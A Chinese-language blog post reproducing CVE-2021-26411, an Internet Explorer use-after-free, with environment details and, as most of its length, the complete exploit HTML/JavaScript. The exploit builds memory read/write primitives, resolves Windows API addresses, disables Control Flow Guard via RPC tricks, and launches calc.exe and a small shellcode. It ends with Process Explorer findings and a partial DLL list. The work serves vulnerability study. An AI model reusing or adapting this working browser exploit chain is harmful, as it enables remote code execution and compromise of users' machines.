CVE-2021-26411复现,学习JavaScript之POC源码分析
概述
CVE-2021-26411 的漏洞成因:removeAttributeNode() 会触发属性对象 nodeValue 的 valueOf 回调,回调期间手动调用 clearAttributes(),
导致 nodeValue 保存的 BSTR 被提前释放。回调返回后,代码没有检查 nodeValue 是否仍然有效就继续使用该对象,最终导致 UAF(Use After Free)。
参考分析链接
国内链接
CVE-2021-26411在野样本中利用RPC绕过CFG缓解技术的研究 (qq.com)
IE浏览器在野0Day CVE-2021-26411漏洞分析 (qq.com)
原作者链接
https://enki.co.kr/blog/2021/02/04/ie_0day.html
平台环境
Win10 1809(17763),下载地址:https://hellowindows.cn/
商业-批量版 64位 2019-09-17 发布
文件:cn_windows_10_business_editions_version_1809_updated_sept_2019_x64_dvd_f873d037.iso(我下载的是这个版本进行复现)
大小:5.07GB
SHA1:975f1b3acbeece56b5ad1526345a0657109f4043
VmWare 16.1.1 build-17801498
复现效果展示
POC源码
<!-- IE Double Free 1Day Poc --> <!doctype html> <html lang="zh-cmn-Hans"> <head> <meta http-equiv="Cache-Control" content="no-cache"> </head> <body> <script language="javascript"> // 重复字符串 String.prototype.repeat = function (size) { return new Array(size + 1).join(this) } function pad0(str) { // 提取倒数第四个字符开始的字符串,效果就是补0 return ('0000' + str).slice(-4) } // Access of Resource Using Incompatible Type ('Type Confusion') function alloc1() { // DataView 视图是一个可以从 二进制ArrayBuffer 对象中读写多种数值类型的底层接口,使用它时,不用考虑不同平台的字节序问题。 var view = new DataView(abf) var str = '' for (var i = 4; i < abf.byteLength - 2; i += 2) str += '%u' + pad0(view.getUint16(i, true).toString(16)) // 创建并返回一个新的属性节点 var result = document.createAttribute('alloc') // 对escape()编码的字符串进行解码 result.nodeValue = unescape(str) return result } function alloc2() { // 创建字典对象 var dic1 = new ActiveXObject('Scripting.Dictionary') var dic2 = new ActiveXObject('Scripting.Dictionary') // 增加新项,dic.add(key,value) dic2.add(0, 1) dic1.add(0, dic2.items()) dic1.add(1, fake) dic1.add(2, arr) for (i = 3; i < 0x20010 / 0x10; ++i) dic1.add(i, 0x12341234) return dic1.items() } function dump(nv) { // ArrayBuffer 对象用来表示通用的、固定长度的原始二进制数据缓冲区。 // 创建一个0x20010字节的缓冲区,并使用一个 DataView 来引用它 var ab = new ArrayBuffer(0x20010) var view = new DataView(ab) for (var i = 0; i < nv.length; ++i) view.setUint16(i * 2 + 4, nv.charCodeAt(i), true) return ab } // 在原型对象上定义属性 function Data(type, value) { this.type = type this.value = value } function setData(i, data) { var arr = new Uint32Array(abf) arr[i * 4] = data.type arr[i * 4 + 2] = data.value } function flush() { hd1.nodeValue = (new alloc1()).nodeValue hd2.nodeValue = 0 // 返回调用该方法的节点的一个副本. 
hd2 = hd1.cloneNode() } // 小端序读取 function read(addr, size) { switch (size) { case 8: return god.getUint8(addr) case 16: // getUint16(byteOffset [, littleEndian]) return god.getUint16(addr, true) case 32: return god.getUint32(addr, true) } } function write(addr, value, size) { switch (size) { case 8: return god.setUint8(addr, value) case 16: return god.setUint16(addr, value, true) case 32: return god.setUint32(addr, value, true) } } function writeData(addr, data) { for (var i = 0; i < data.length; ++i) write(addr + i, data[i], 8) } function addrOf(obj) { arr[0] = obj return read(pArr, 32) } function strcmp(str1, str2) { // typeof 操作符返回一个字符串,表示未经计算的操作数的类型。 str1 = (typeof str1 == 'string') ? str1 : toStr(str1) str2 = (typeof str2 == 'string') ? str2 : toStr(str2) return str1.toLowerCase() == str2.toLowerCase() } function memcpy(dst, src, size) { for (var i = 0; i < size; ++i) write(dst + i, read(src + i, 8), 8) } function toStr(addr) { var str = '' while (true) { var c = read(addr, 8) // 遇到终结符就退出循环 if (c == 0) break // 返回由指定的 UTF-16 代码单元序列创建的字符串 str += String.fromCharCode(c) addr++ } return str } function newStr(str) { var buffer = createArrayBuffer(str.length + 1) for (var i = 0; i < str.length; ++i) write(buffer + i, str.charCodeAt(i), 8) // 写入字符串终结符 write(buffer + i, 0, 8) return buffer } // PE文件相关操作函数 function getDllBase(base, name) { var tmpValue = 0 var index = 0 var iat = base + read(base + read(base + 60, 32) + 128, 32) while (true) { var offset = read(iat + index * 20 + 12, 32) if (strcmp(base + offset, name)) break index++ } var addr = read(iat + index * 20 + 16, 32) return getBase(read(base + addr, 32)) } function getBase(addr) { var addr = addr & 0xffff0000 while (true) { if (isMZ(addr) && isPE(addr)) break addr -= 0x10000 } return addr } function isMZ(addr) { return read(addr, 16) == 0x5a4d } function isPE(addr) { var sizeOfHeaders = read(addr + 60, 32) if (sizeOfHeaders > 0x600) return null var addr = addr + sizeOfHeaders if (read(addr, 32) != 0x4550) 
return null return addr } function winVer() { // 返回浏览器的平台和版本信息 var appVersion = window.navigator.appVersion var ver = 0 // 检测一个字符串是否匹配某个模式,javaScript正则表达式 if (/(Windows 10.0|Windows NT 10.0)/.test(appVersion)) { ver = 100 } else if (/(Windows 8.1|Windows NT 6.3)/.test(appVersion)) { ver = 81 } else if (/(Windows 8|Windows NT 6.2)/.test(appVersion)) { ver = 80 } else { ver = 70 } return ver } function createArrayBuffer(size) { var ab = new ArrayBuffer(size) var bs = read(addrOf(ab) + 0x1c, 32) // 设置键值对 map.set(bs, ab) return bs } function getProcAddr(addr, name) { var eat = addr + read(addr + read(addr + 0x3c, 32) + 0x78, 32) var non = read(eat + 0x18, 32) var aof = addr + read(eat + 0x1c, 32) var aon = addr + read(eat + 0x20, 32) var aono = addr + read(eat + 0x24, 32) for (var i = 0; i < non; ++i) { var offset = read(aon + i * 4, 32) if (strcmp(addr + offset, name)) break } var offset = read(aono + i * 2, 16) return addr + read(aof + offset * 4, 32) } function readyRpcCall(func) { var PRPC_CLIENT_INTERFACE_Buffer = _RPC_MESSAGE.get(msg, 'RpcInterfaceInformation') var _MIDL_SERVER_INFO_Buffer = PRPC_CLIENT_INTERFACE.get(PRPC_CLIENT_INTERFACE_Buffer, 'InterpreterInfo') var RPC_DISPATCH_TABLE_Buffer = _MIDL_SERVER_INFO_.get(_MIDL_SERVER_INFO_Buffer, 'DispatchTable') write(RPC_DISPATCH_TABLE_Buffer, func, 32) } function setArgs(args) { var buffer = createArrayBuffer(48) for (var i = 0; i < args.length; ++i) { write(buffer + i * 4, args[i], 32) } _RPC_MESSAGE.set(msg, 'Buffer', buffer) _RPC_MESSAGE.set(msg, 'BufferLength', 48) _RPC_MESSAGE.set(msg, 'RpcFlags', 0x1000) return buffer } function callRpcFreeBufferImpl() { var buffer = _RPC_MESSAGE.get(msg, 'Buffer') _RPC_MESSAGE.set(rpcFree, 'Buffer', buffer) return call(rpcFree) } function callRpcFreeBuffer() { var buffer = _RPC_MESSAGE.get(msg, 'Buffer') var result = read(buffer, 32) callRpcFreeBufferImpl() return result } function call2(func, args) { readyRpcCall(func) var buffer = setArgs(args) call(msg) 
map.delete(buffer) return callRpcFreeBuffer() } function call(addr) { var result = 0 write(paoi + 0x18, addr, 32) // 错误处理 try { // rpcrt4!NdrServerCall2 xyz.normalize() } catch (error) { result = error.number } write(paoi + 0x18, patt, 32) return result } function prepareCall(addr, func) { var buf = createArrayBuffer(cattr.size()) var vft = read(patt, 32) memcpy(addr, patt, cbase.size()) memcpy(buf, vft, cattr.size()) cbase.set(addr, 'pvftable', buf) cattr.set(buf, 'normalize', func) } function createBase() { var isWin7 = winVer() == 70 var size = isWin7 ? 560 : 572 var offset = isWin7 ? 540 : 548 var addr1 = createArrayBuffer(size + cbase.size()) var addr2 = createArrayBuffer(48) write(addr1 + offset, addr2, 32) write(addr2 + 40, 8, 32) write(addr2 + 36, 8, 32) return { size: size, addr: addr1 } } function aos() { var baseObj = createBase() var addr = baseObj.addr + baseObj.size var I_RpcTransServerNewConnection = getProcAddr(rpcrt4, 'I_RpcTransServerNewConnection') prepareCall(addr, I_RpcTransServerNewConnection) return read(read(call(addr)-0xf8, 32), 32) } // 自定义结构体的操作 function SymTab(size, sym) { this.size = function() { return size } this.set = function(addr, name, value) { var o = sym[name] write(addr + o.offset, value, o.size) } this.get = function(addr, name) { var o = sym[name] return read(addr + o.offset, o.size) } } // 构造RPC function initRpc() { var data = [50,72,0,0,0,0,0,0,52,0,192,0,16,0,68,13,10,1,0,0,0,0,0,0,0,0,72,0,0,0,9,0,72,0,4,0,9,0,72,0,8,0,9,0,72,0,12,0,9,0,72,0,16,0,9,0,72,0,20,0,9,0,72,0,24,0,9,0,72,0,28,0,9,0,72,0,32,0,9,0,72,0,36,0,9,0,72,0,40,0,9,0,72,0,44,0,9,0,112,0,48,0,9,0,0] var NdrServerCall2 = getProcAddr(rpcrt4, 'NdrServerCall2') var NdrOleAllocate = getProcAddr(rpcrt4, 'NdrOleAllocate') var NdrOleFree = getProcAddr(rpcrt4, 'NdrOleFree') var RPCMessageObject = createArrayBuffer(cbase.size()) var buffer = createArrayBuffer(0x100) var buffer2 = createArrayBuffer(0x200) var AttributeVtable = read(patt, 32) var MSHTMLSymbolBuffer = 
createArrayBuffer(0x1000) var TransferSyntaxBuffer = createArrayBuffer(syntaxObject.size()) var PRPC_CLIENT_INTERFACE_Buffer = createArrayBuffer(PRPC_CLIENT_INTERFACE.size()) var _MIDL_SERVER_INFO_Buffer = createArrayBuffer(_MIDL_SERVER_INFO_.size()) var rpcProcStringBuffer = createArrayBuffer(data.length) writeData(rpcProcStringBuffer, data) var _MIDL_STUB_DESC_Buffer = createArrayBuffer(_MIDL_STUB_DESC.size()) var RPC_DISPATCH_TABLE_Buffer = createArrayBuffer(RPC_DISPATCH_TABLE.size()) var NdrServerCall2Buffer = createArrayBuffer(4) write(NdrServerCall2Buffer, NdrServerCall2, 32) write(MSHTMLSymbolBuffer, osf_vft, 32) write(MSHTMLSymbolBuffer + 4, 0x89abcdef, 32) write(MSHTMLSymbolBuffer + 8, 0x40, 32) cattr.set(MSHTMLSymbolBuffer, '__vtguard', cattr.get(AttributeVtable, '__vtguard')) cattr.set(MSHTMLSymbolBuffer, 'SecurityContext', cattr.get(AttributeVtable, 'SecurityContext')) cattr.set(MSHTMLSymbolBuffer, 'JSBind_InstanceOf', cattr.get(AttributeVtable, 'JSBind_InstanceOf')) cattr.set(MSHTMLSymbolBuffer, 'JSBind_TypeId', cattr.get(AttributeVtable, 'JSBind_TypeId')) cattr.set(MSHTMLSymbolBuffer, 'normalize', NdrServerCall2) cbase.set(RPCMessageObject, 'pSecurityContext', RPCMessageObject + 68) write(RPCMessageObject + 76, 1, 32) syntaxObject.set(TransferSyntaxBuffer, 'SyntaxVersion.MajorVersion', 2) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'RpcInterfaceInformation', PRPC_CLIENT_INTERFACE_Buffer) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'pfnAllocate', NdrOleAllocate) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'pfnFree', NdrOleFree) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'pFormatTypes', buffer2) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'fCheckBounds', 1) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'Version', 0x50002) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'MIDLVersion', 0x800025b) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'mFlags', 1) _MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'pStubDesc', _MIDL_STUB_DESC_Buffer) 
_MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'DispatchTable', createArrayBuffer(32)) _MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'ProcString', rpcProcStringBuffer) _MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'FmtStringOffset', buffer2) RPC_DISPATCH_TABLE.set(RPC_DISPATCH_TABLE_Buffer, 'DispatchTableCount', 1) RPC_DISPATCH_TABLE.set(RPC_DISPATCH_TABLE_Buffer, 'DispatchTable', NdrServerCall2Buffer) PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'DispatchTable', RPC_DISPATCH_TABLE_Buffer) PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'InterpreterInfo', _MIDL_SERVER_INFO_Buffer) PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'Length', PRPC_CLIENT_INTERFACE.size()) PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'InterfaceId.SyntaxVersion.MajorVersion', 1) PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'TransferSyntax.SyntaxVersion.MajorVersion', 2) PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'Flags', 0x4000000) _RPC_MESSAGE.set(RPCMessageObject, 'RpcInterfaceInformation', PRPC_CLIENT_INTERFACE_Buffer) _RPC_MESSAGE.set(RPCMessageObject, 'TransferSyntax', TransferSyntaxBuffer) _RPC_MESSAGE.set(RPCMessageObject, 'Handle', MSHTMLSymbolBuffer) _RPC_MESSAGE.set(RPCMessageObject, 'DataRepresentation', 16) _RPC_MESSAGE.set(RPCMessageObject, 'RpcFlags', 0x1000) _RPC_MESSAGE.set(RPCMessageObject, 'Buffer', buffer) _RPC_MESSAGE.set(RPCMessageObject, 'BufferLength', 48) return RPCMessageObject } function rpcFree() { var Cbase = createArrayBuffer(cbase.size()) var I_RpcFreeBuffer = getProcAddr(rpcrt4, 'I_RpcFreeBuffer') var MSHTMLSymbolBuffer = createArrayBuffer(0x1000) var AttributeVtable = read(patt, 32) write(MSHTMLSymbolBuffer, osf_vft, 32) write(MSHTMLSymbolBuffer + 4, 0x89abcdef, 32) write(MSHTMLSymbolBuffer + 8, 64, 32) cattr.set(MSHTMLSymbolBuffer, '__vtguard', cattr.get(AttributeVtable, '__vtguard')) cattr.set(MSHTMLSymbolBuffer, 'SecurityContext', cattr.get(AttributeVtable, 'SecurityContext')) 
cattr.set(MSHTMLSymbolBuffer, 'JSBind_InstanceOf', cattr.get(AttributeVtable, 'JSBind_InstanceOf')) cattr.set(MSHTMLSymbolBuffer, 'JSBind_TypeId', cattr.get(AttributeVtable, 'JSBind_TypeId')) cattr.set(MSHTMLSymbolBuffer, 'normalize', I_RpcFreeBuffer) cbase.set(Cbase, 'pvftable', MSHTMLSymbolBuffer) cbase.set(Cbase, 'pSecurityContext', Cbase + 68) write(Cbase + 76, 1, 32) return Cbase } function CFGObject(baseAddress) { var PEAddr = isPE(baseAddress) var eat = PEAddr + 120 var LOAD_CONFIG_DIRECTORY = baseAddress + read(eat + 0x50, 32) var size = read(LOAD_CONFIG_DIRECTORY, 32) var sizeOfImage = read(PEAddr + 0x50, 32) var CFGSymbolTable = new SymTab(0x5c, { '___guard_check_icall_fptr': { offset: 72, size: 32 } }) var guard_check_icall_fptr_address = size < CFGSymbolTable.size() ? 0 : CFGSymbolTable.get(LOAD_CONFIG_DIRECTORY, '___guard_check_icall_fptr') this.getCFGAddress = function() { return guard_check_icall_fptr_address } this.getCFGValue = function() { if (size < CFGSymbolTable.size()) return false var currentCFGValue = read(guard_check_icall_fptr_address, 32) var isValidAddress = (baseAddress < currentCFGValue) && (currentCFGValue < baseAddress + sizeOfImage) return !isValidAddress; } } function killCfg(addr) { var cfgobj = new CFGObject(addr) if (!cfgobj.getCFGValue()) return var guard_check_icall_fptr_address = cfgobj.getCFGAddress() var KiFastSystemCallRet = getProcAddr(ntdll, 'KiFastSystemCallRet') var tmpBuffer = createArrayBuffer(4) // 修改RPCRT4!__guard_check_icall_fptr的属性为PAGE_EXECUTE_READWRITE call2(VirtualProtect, [guard_check_icall_fptr_address, 0x1000, 0x40, tmpBuffer]) // 替换rpcrt4!__guard_check_icall_fptr保存的指针,修改ntdll!LdrpValidateUserCallTarget为改为ntdll!KiFastSystemCallRet // 关闭rpcrt4的CFG检查 write(guard_check_icall_fptr_address, KiFastSystemCallRet, 32) // 恢复PRCRT4!__gurad_check_icall_fptr内存属性 call2(VirtualProtect, [guard_check_icall_fptr_address, 0x1000, read(tmpBuffer, 32), tmpBuffer]) map.delete(tmpBuffer) } // {} 表示对象 // 属性:属性值 var cbase = new 
SymTab(0x60, { 'pvftable': { offset: 0x0, size: 32 }, 'pSecurityContext': { offset: 0x44, size: 32 } }) var cattr = new SymTab(0x32c, { '__vtguard': { offset: 0x48, size: 32 }, 'SecurityContext': { offset: 0xc8, size: 32 }, 'JSBind_TypeId': { offset: 0x160, size: 32 }, 'JSBind_InstanceOf': { offset: 0x164, size: 32 }, 'normalize': { offset: 0x28c, size: 32 } }) var syntaxObject = new SymTab(0x14, { 'SyntaxVersion.MajorVersion': { offset: 0x10, size: 16 } }) var PRPC_CLIENT_INTERFACE = new SymTab(0x44, { 'Length': { offset: 0, size: 32 }, 'InterfaceId.SyntaxVersion.MajorVersion': { offset: 20, size: 16 }, 'TransferSyntax.SyntaxVersion.MajorVersion': { offset: 40, size: 16 }, // 保存了runtime库和Stub函数的接口指针 'DispatchTable': { offset: 44, size: 32 }, // 指向MIDL_SERVER_INFO结构 'InterpreterInfo': { offset: 60, size: 32 }, 'Flags': { offset: 64, size: 32 } }) // 保存了服务端IDL接口信息 var _MIDL_SERVER_INFO_ = new SymTab(0x20, { 'pStubDesc': { offset: 0, size: 32 }, // 保存了服务端提供的远程调用例程的函数指针数组 'DispatchTable': { offset: 4, size: 32 }, 'ProcString': { offset: 8, size: 32 }, 'FmtStringOffset': { offset: 12, size: 32 } }) var _MIDL_STUB_DESC = new SymTab(0x50, { 'RpcInterfaceInformation': { offset: 0, size: 32 }, 'pfnAllocate': { offset: 4, size: 32 }, 'pfnFree': { offset: 8, size: 32 }, 'pFormatTypes': { offset: 32, size: 32 }, 'fCheckBounds': { offset: 36, size: 32 }, 'Version': { offset: 40, size: 32 }, 'MIDLVersion': { offset: 48, size: 32 }, 'mFlags': { offset: 64, size: 32 } }) var RPC_DISPATCH_TABLE = new SymTab(12, { 'DispatchTableCount': { offset: 0, size: 32 }, 'DispatchTable': { offset: 4, size: 32 }, }) var _RPC_MESSAGE = new SymTab(0x2c, { 'Handle': { offset: 0, size: 32 }, 'DataRepresentation': { offset: 4, size: 32 }, // 存放函数的参数 'Buffer': { offset: 8, size: 32 }, 'BufferLength': { offset: 12, size: 32 }, 'TransferSyntax': { offset: 20, size: 32 }, // 指向RPC_SERVER_INTERFACE 'RpcInterfaceInformation': { offset: 24, size: 32 }, 'RpcFlags': { offset: 40, size: 32 } }) var god // 
对象数组 var arr = [{}] var fake = new ArrayBuffer(0x100) var abf = new ArrayBuffer(0x20010) var alloc = alloc2() // 创建一个HTML 属性对象 var hd0 = document.createAttribute('handle') var hd1 = document.createAttribute('handle') var hd2 // 创建一个HTML 元素对象 var ele = document.createElement('element') var att = document.createAttribute('attribute') att.nodeValue = { valueOf: function() { hd1.nodeValue = (new alloc1()).nodeValue // 回调时,清除ele对象绑定的所有属性 ele.clearAttributes() hd2 = hd1.cloneNode() ele.setAttribute('attribute', 1337) } } ele.setAttributeNode(att) ele.setAttribute('attr', '0'.repeat((0x20010 - 6) / 2)) // 触发valueof函数回调 ele.removeAttributeNode(att) hd0.nodeValue = alloc var leak = new Uint32Array(dump(hd2.nodeValue)) var pAbf = leak[6] var pArr = leak[10] var VT_I4 = 0x3 var VT_DISPATCH = 0x9 var VT_BYREF = 0x4000 var bufArr = new Array(0x10) var fakeArr = new Uint32Array(fake) for (var i = 0; i < 0x10; ++i) setData(i + 1, new Data(VT_BYREF | VT_I4, pAbf + i * 4)) flush() var ref = new VBArray(hd0.nodeValue) for (var i = 0; i < 0x10; ++i) bufArr[i] = ref.getItem(i + 1) ref = null setData(1, new Data(VT_BYREF | VT_I4, bufArr[4])) setData(2, new Data(VT_BYREF | VT_I4, bufArr[4] + 0x04)) setData(3, new Data(VT_BYREF | VT_I4, bufArr[4] + 0x1c)) flush() ref = new VBArray(hd0.nodeValue) var vt = ref.getItem(1) var gc = ref.getItem(2) var bs = ref.getItem(3) ref = null for (var i = 0; i < 16; ++i) fakeArr[i] = bufArr[i] fakeArr[4] = bs + 0x40 fakeArr[16] = vt fakeArr[17] = gc fakeArr[24] = 0xffffffff setData(1, new Data(VT_DISPATCH, bs)) flush() ref = new VBArray(hd0.nodeValue) god = new DataView(ref.getItem(1)) ref = null pArr = read(read(pArr + 0x10, 32) + 0x14, 32) + 0x10 write(read(addrOf(hd0) + 0x18, 32) + 0x28, 0, 32) var map = new Map() var jscript9 = getBase(read(addrOf(map), 32)) var rpcrt4 = getDllBase(jscript9, 'rpcrt4.dll') var msvcrt = getDllBase(jscript9, 'msvcrt.dll') var ntdll = getDllBase(msvcrt, 'ntdll.dll') var kernelbase = getDllBase(msvcrt, 'kernelbase.dll') 
var VirtualProtect = getProcAddr(kernelbase, 'VirtualProtect') var LoadLibraryExA = getProcAddr(kernelbase, 'LoadLibraryExA') var xyz = document.createAttribute('xyz') var paoi = addrOf(xyz) var patt = read(addrOf(xyz) + 0x18, 32) var osf_vft = aos() var msg = initRpc() var rpcFree = rpcFree() killCfg(rpcrt4) // 调用API,弹出计算器 var kernel32 = call2(LoadLibraryExA,[newStr('kernel32.dll',0,1)]) var WinExec = getProcAddr(kernel32,'WinExec') call2(WinExec,[newStr('calc.exe'),5]) // 调用shellcode var shellcode = new Uint8Array([0xb8, 0x37, 0x13, 0x00, 0x00, 0xc3]) var msi = call2(LoadLibraryExA, [newStr('msi.dll'), 0, 1]) + 0x5000 var tmpBuffer = createArrayBuffer(4) call2(VirtualProtect, [msi, shellcode.length, 0x4, tmpBuffer]) writeData(msi, shellcode) // mov eax, 0x1337 ; ret call2(VirtualProtect, [msi, shellcode.length, read(tmpBuffer, 32), tmpBuffer]) var result = call2(msi, []) // 根据shellocde的而反汇编结果,这里会弹出0x1337的对话框 alert(result.toString(16)) </script> </body> </html>
注意细节:我是把 html 保存到本地后打开复现的,文件路径为:
C:\Users\bonelee\Desktop\1809.html
如果放在服务器上运行再通过浏览器访问,则不会弹出计算器,但会有如下弹窗:
我们使用proc exp采集下数据:
可以看到 ie 并没有 calc 的子进程!从其加载的 dll 里,可以看到有 mshtml.dll!
可以看到它是从 svchost 启动出来的。
我们重点看下ie加载的dll清单:
Process: iexplore.exe Pid: 2280 Name Description Company Name Path {6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db {AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db C:\Users\bonelee\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db {DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db advapi32.dll Advanced Windows 32 Base API Microsoft Corporation C:\Windows\SysWOW64\advapi32.dll apphelp.dll 应用程序兼容性客户端库 Microsoft Corporation C:\Windows\SysWOW64\apphelp.dll bcrypt.dll Windows Cryptographic Primitives Library (Wow64) Microsoft Corporation C:\Windows\SysWOW64\bcrypt.dll bcryptprimitives.dll Windows Cryptographic Primitives Library Microsoft Corporation C:\Windows\SysWOW64\bcryptprimitives.dll C_1252.NLS C:\Windows\System32\C_1252.NLS cfgmgr32.dll Configuration Manager DLL Microsoft Corporation C:\Windows\SysWOW64\cfgmgr32.dll clbcatq.dll COM+ Configuration Catalog Microsoft Corporation C:\Windows\SysWOW64\clbcatq.dll combase.dll Microsoft COM for Windows Microsoft Corporation C:\Windows\SysWOW64\combase.dll comctl32.dll 用户体验控件库 Microsoft Corporation C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll comctl32.dll 用户体验控件库 Microsoft Corporation C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\comctl32.dll comdlg32.dll Common Dialogs DLL Microsoft Corporation C:\Windows\SysWOW64\comdlg32.dll coml2.dll Microsoft COM for Windows Microsoft Corporation C:\Windows\SysWOW64\coml2.dll CoreMessaging.dll Microsoft CoreMessaging Dll Microsoft Corporation C:\Windows\SysWOW64\CoreMessaging.dll CoreUIComponents.dll Microsoft Core UI Components Dll 
Microsoft Corporation C:\Windows\SysWOW64\CoreUIComponents.dll crypt32.dll Crypto API32 Microsoft Corporation C:\Windows\SysWOW64\crypt32.dll cryptbase.dll Base cryptographic API DLL Microsoft Corporation C:\Windows\SysWOW64\cryptbase.dll cryptsp.dll Cryptographic Service Provider API Microsoft Corporation C:\Windows\SysWOW64\cryptsp.dll cversions.2.db C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db cversions.2.db C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db d2d1.dll Microsoft D2D Library Microsoft Corporation C:\Windows\SysWOW64\d2d1.dll d3d11.dll Direct3D 11 Runtime Microsoft Corporation C:\Windows\SysWOW64\d3d11.dll DataExchange.dll Data exchange Microsoft Corporation C:\Windows\SysWOW64\DataExchange.dll dcomp.dll Microsoft DirectComposition Library Microsoft Corporation C:\Windows\SysWOW64\dcomp.dll directmanipulation.dll Microsoft Direct Manipulation Component Microsoft Corporation C:\Windows\SysWOW64\directmanipulation.dll dwmapi.dll Microsoft Desktop Window Manager API Microsoft Corporation C:\Windows\SysWOW64\dwmapi.dll DWrite.dll Microsoft DirectX Typography Services Microsoft Corporation C:\Windows\SysWOW64\DWrite.dll dxgi.dll DirectX Graphics Infrastructure Microsoft Corporation C:\Windows\SysWOW64\dxgi.dll efswrt.dll Storage Protection Windows Runtime DLL Microsoft Corporation C:\Windows\SysWOW64\efswrt.dll gdi32.dll GDI Client DLL Microsoft Corporation C:\Windows\SysWOW64\gdi32.dll gdi32full.dll GDI Client DLL Microsoft Corporation C:\Windows\SysWOW64\gdi32full.dll ieapfltr.dll Microsoft SmartScreen Filter Microsoft Corporation C:\Windows\SysWOW64\ieapfltr.dll ieframe.dll Internet 浏览器 Microsoft Corporation C:\Windows\SysWOW64\ieframe.dll ieframe.dll.mui Internet 浏览器 Microsoft Corporation C:\Windows\System32\zh-CN\ieframe.dll.mui ieproxy.dll IE ActiveX Interface Marshaling Library Microsoft Corporation C:\Windows\SysWOW64\ieproxy.dll iertutil.dll Internet Explorer 的运行时实用程序 Microsoft Corporation C:\Windows\SysWOW64\iertutil.dll 
IEShims.dll Internet Explorer Compatibility Shims Microsoft Corporation C:\Program Files (x86)\Internet Explorer\IEShims.dll ieui.dll Internet Explorer UI 引擎 Microsoft Corporation C:\Windows\SysWOW64\ieui.dll iexplore.exe Internet Explorer Microsoft Corporation C:\Program Files (x86)\Internet Explorer\iexplore.exe iexplore.exe.mui Internet Explorer Microsoft Corporation C:\Program Files\internet explorer\zh-CN\iexplore.exe.mui imageres.dll Windows Image Resource Microsoft Corporation C:\Windows\SysWOW64\imageres.dll imageres.dll.mui Windows Image Resource Microsoft Corporation C:\Windows\System32\en-US\imageres.dll.mui imm32.dll Multi-User Windows IMM32 API Client DLL Microsoft Corporation C:\Windows\SysWOW64\imm32.dll IPHLPAPI.DLL IP Helper API Microsoft Corporation C:\Windows\SysWOW64\IPHLPAPI.DLL jscript9.dll Microsoft (R) JScript Microsoft Corporation C:\Windows\SysWOW64\jscript9.dll kernel.appcore.dll AppModel API Host Microsoft Corporation C:\Windows\SysWOW64\kernel.appcore.dll kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation C:\Windows\SysWOW64\kernel32.dll KernelBase.dll Windows NT BASE API Client DLL Microsoft Corporation C:\Windows\SysWOW64\KernelBase.dll KernelBase.dll.mui Windows NT 基本 API 客户端 DLL Microsoft Corporation C:\Windows\System32\zh-CN\KernelBase.dll.mui locale.nls C:\Windows\System32\locale.nls mlang.dll Multi Language Support DLL Microsoft Corporation C:\Windows\SysWOW64\mlang.dll mlang.dll.mui 多语言支持 DLL Microsoft Corporation C:\Windows\System32\zh-CN\mlang.dll.mui mpr.dll Multiple Provider Router DLL Microsoft Corporation C:\Windows\SysWOW64\mpr.dll msasn1.dll ASN.1 Runtime APIs Microsoft Corporation C:\Windows\SysWOW64\msasn1.dll msctf.dll MSCTF Server DLL Microsoft Corporation C:\Windows\SysWOW64\msctf.dll mshtml.dll Microsoft (R) HTML 查看器 Microsoft Corporation C:\Windows\SysWOW64\mshtml.dll mshtml.dll.mui Microsoft (R) HTML 查看器 Microsoft Corporation C:\Windows\System32\zh-CN\mshtml.dll.mui msi.dll Windows Installer 
Microsoft Corporation C:\Windows\SysWOW64\msi.dll msimtf.dll Active IMM Server DLL Microsoft Corporation C:\Windows\SysWOW64\msimtf.dll msIso.dll Isolation Library for Internet Explorer Microsoft Corporation C:\Windows\SysWOW64\msIso.dll msvcp_win.dll Microsoft® C Runtime Library Microsoft Corporation C:\Windows\SysWOW64\msvcp_win.dll msvcrt.dll Windows NT CRT DLL Microsoft Corporation C:\Windows\SysWOW64\msvcrt.dll mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation C:\Windows\SysWOW64\mswsock.dll netapi32.dll Net Win32 API DLL Microsoft Corporation C:\Windows\SysWOW64\netapi32.dll netmsg.dll 网络消息 DLL Microsoft Corporation C:\Windows\SysWOW64\netmsg.dll netmsg.dll.mui 网络消息 DLL Microsoft Corporation C:\Windows\System32\zh-CN\netmsg.dll.mui netutils.dll Net Win32 API Helpers DLL Microsoft 